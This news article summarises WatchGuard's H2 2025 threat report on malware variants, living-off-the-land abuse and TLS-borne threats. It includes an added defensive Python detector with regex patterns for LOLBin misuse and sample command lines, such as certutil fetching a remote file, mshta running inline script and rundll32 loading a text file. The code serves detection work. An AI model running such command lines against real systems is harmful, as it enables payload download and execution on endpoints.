
WatchGuard: New Malware Variants Surge 1,500% in H2 2025

WatchGuard’s H2 2025 report shows new malware variants up 1,548%, as attackers shift to LotL tactics, encrypted delivery, and evasive threats

Feb 19, 2026

A new report from WatchGuard Technologies reveals that unique malware detections on endpoints skyrocketed by 1,548% in the second half of 2025, even as overall malware volume dipped slightly. 

Internet Security Report findings suggest threat actors are bypassing traditional defenses

The findings, published in the company’s H2 2025 Internet Security Report, highlight a sharp pivot in attacker tactics toward stealthier, more evasive techniques, including a heavy reliance on “living-off-the-land” (LotL) attacks.

According to the report, total endpoint malware detections fell about 4.6% in H2 2025. But that headline masks a deeper shift: new and previously unseen malware variants surged significantly, especially in the fourth quarter.

The spike suggests threat actors are investing in new, customized malware strains designed to bypass traditional defenses. Nearly 23% of malware detected during the period evaded signature-based tools entirely, requiring more advanced behavioral or AI-driven detection to stop it.


Living-off-the-land takes center stage

Attackers have also changed their delivery methods. For years, malicious PowerShell scripts were the go-to tool for attackers.

Now, they are increasingly using LotL tactics, abusing legitimate, signed Windows binaries that already exist on the endpoint to blend into normal activity and avoid detection.

By the end of 2025, legitimate Windows binaries had become the top malware vector on endpoints. Because these files are “inherently trusted” by the system, attackers can hide in plain sight.

This change underscores a growing challenge: when attackers use legitimate tools already present on a system, distinguishing between normal and malicious behavior becomes significantly more complex. A file hash or signature check says nothing, because the binary really is the vendor’s own; what separates abuse from routine use is context, namely the command-line arguments, the parent process, and what the process does next.
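As an added example (not code from the WatchGuard report or from Channel Insider), the Python script below shows what “distinguishing normal from malicious” looks like in practice for LotL: it triages constructed process-creation events carrying the fields a Sysmon Event ID 1 or Windows 4688 record would provide (image, command line, parent image), flags a signed Windows utility only when its arguments turn it into a downloader, decoder or script host, and raises the score when a document handler such as Word spawned it. The binary list, argument patterns, score weights and sample events are all illustrative assumptions, not an exhaustive LOLBin catalogue.

```python
"""Triage Windows process-creation events for living-off-the-land (LotL) abuse.

Added example, not code from the WatchGuard report or Channel Insider. The
events are constructed to carry the fields a Sysmon Event ID 1 or Windows
4688 record would provide (image, command line, parent image). The binary
list, argument patterns and score weights are illustrative assumptions, not
an exhaustive LOLBin catalogue.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str   # its command line as logged
    parent_image: str   # full path of the parent process


@dataclass
class Finding:
    image: str
    score: int
    reasons: list


# Signed OS binaries that are routinely abused, keyed by basename, with the
# argument patterns that turn a benign utility into a downloader, decoder or
# script host. (Assumed list; extend it from your own telemetry.)
LOLBIN_RULES = {
    "certutil.exe": [
        (re.compile(r"-urlcache\b.*\bhttps?://", re.I), "certutil fetching a remote file"),
        (re.compile(r"-decode\b", re.I), "certutil decoding a base64 payload"),
    ],
    "mshta.exe": [
        (re.compile(r"https?://|javascript:|vbscript:", re.I), "mshta running remote or inline script"),
    ],
    "rundll32.exe": [
        (re.compile(r"javascript:|\.(?:txt|dat|png|jpg|log)\b", re.I), "rundll32 loading script or a non-DLL file"),
    ],
    "regsvr32.exe": [
        (re.compile(r"/i:https?://|scrobj\.dll", re.I), "regsvr32 loading a remote scriptlet"),
    ],
    "bitsadmin.exe": [
        (re.compile(r"/transfer\b.*\bhttps?://", re.I), "bitsadmin used as a downloader"),
    ],
    "msiexec.exe": [
        (re.compile(r"/(?:i|package)\s+https?://", re.I), "msiexec installing a remote package"),
    ],
}

# Parents that should almost never launch these utilities directly
# (document handlers and script hosts); assumed list.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
}


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def score_event(ev: ProcessEvent):
    """Return a Finding if the event looks like LotL abuse, otherwise None.

    A known LOLBin with ordinary arguments is deliberately NOT flagged: the
    binary itself is legitimate, and only the context (arguments, parent)
    separates abuse from routine administrative use.
    """
    rules = LOLBIN_RULES.get(_basename(ev.image))
    if not rules:
        return None
    reasons = [why for pattern, why in rules if pattern.search(ev.command_line)]
    if not reasons:
        return None
    score = 5 * len(reasons)
    parent = _basename(ev.parent_image)
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
        score += 5
    return Finding(image=_basename(ev.image), score=score, reasons=reasons)


def triage(events):
    """Score every event and return the findings, highest score first."""
    findings = [f for f in map(score_event, events) if f is not None]
    return sorted(findings, key=lambda f: f.score, reverse=True)


# Constructed sample events (not real telemetry); 203.0.113.9 is a
# documentation address.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.9/a.txt C:\Users\Public\a.txt",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",      # routine admin use, must not fire
                 r"certutil.exe -verify C:\Temp\server.cer",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\Public\a.txt,Start",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r'mshta.exe javascript:close(new ActiveXObject("WScript.Shell").Run("calc.exe"))',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe",       # not a LOLBin at all
                 r"notepad.exe report.txt",
                 r"C:\Windows\explorer.exe"),
]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.score:>3}  {f.image:<14} {'; '.join(f.reasons)}")
```

The point of the design is in `score_event`: `certutil -verify` from a cmd prompt produces no finding even though certutil is on the abuse list, while the same binary fetching a remote file under WINWORD.EXE scores highest. Feeding this kind of logic requires command-line and parent-process fields in your endpoint telemetry; a file-hash feed alone cannot express the rule.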

Encryption continues to provide cover for attackers. Malware delivered over encrypted TLS connections remained high, accounting for 96% of blocked threats, which means a perimeter device that does not decrypt and inspect TLS sees almost none of them.

More concerning, evasive malware detected over TLS jumped nearly 2,000% during the reporting period.

Read alongside the surge in unique variants against a slightly lower overall volume, the data suggests attackers may be relying less on brand-new exploits and more on repackaged or obfuscated versions of known threats.


Ransomware falls, cryptomining rises

On a positive note, network-based attacks slowed, with Intrusion Prevention Service (IPS) detections dropping 28% per Firebox appliance. Ransomware extortion events also cooled significantly, declining by 68% over the course of the year. However, the report warns security professionals not to mistake this dip for victory.

As commodity malware becomes easier to license on the dark web and automated AI-powered attacks emerge, the entry barrier for new criminals has never been lower.

Meanwhile, crypto mining malware is back on the rise, reaching highs not seen since the beginning of the year as a “popular and easy way to monetize infected victims.”


Why this matters

Taken together, the findings point to a stealthier and more sophisticated threat environment. Attackers are focusing less on volume and more on stealth, encryption, and abuse of legitimate system tools.

For defenders, visibility is everything. Enabling TLS inspection (which in practice means distributing the inspecting CA to managed endpoints and deciding which destinations to exempt), hardening endpoints against LotL abuse, and deploying behavioral analysis tools are no longer optional; without them, most of the traffic and activity described in the report is simply invisible.

MSPs and MSSPs will need to build their own defenses while also guiding customers through increasingly sophisticated threats.

Aminu Abdullahi

Aminu Abdullahi is a contributing writer for Channel Insider and a B2B technology and finance writer with over 6 years of experience. He has written for various other tech publications, including TechRepublic, eSecurity Planet, IT Business Edge, and more.
